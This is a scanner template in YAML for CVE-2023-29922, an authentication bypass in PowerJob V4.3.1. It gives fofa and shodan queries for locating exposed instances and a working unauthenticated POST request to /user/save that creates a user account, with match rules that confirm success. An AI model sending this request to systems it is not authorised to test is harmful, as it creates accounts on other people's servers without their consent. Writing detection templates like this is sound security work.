id: CVE-2023-29922

info:
  name: PowerJob V4.3.1 - Authentication Bypass
  author: Co5mos
  severity: high
  verified: true
  description: |
    PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.
    fofa-query: app="PowerJob"
    shodan-query: html:"PowerJob"
  reference:
    - https://github.com/PowerJob/PowerJob/issues/585
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29922
  tags: cve,cve2023,auth-bypass,powerjob
  created: 2023/05/26

set:
  randstr: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /user/save
      headers:
        Content-Type: application/json
      body: '{"username":"{{randstr}}","phone":"{{randstr}}","email":"{{randstr}}","webHook":"{{randstr}}"}'
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"success":true') && 
      response.body.bcontains(b'"data":null') && 
      response.headers["content-type"].contains("application/json")
expression: r0()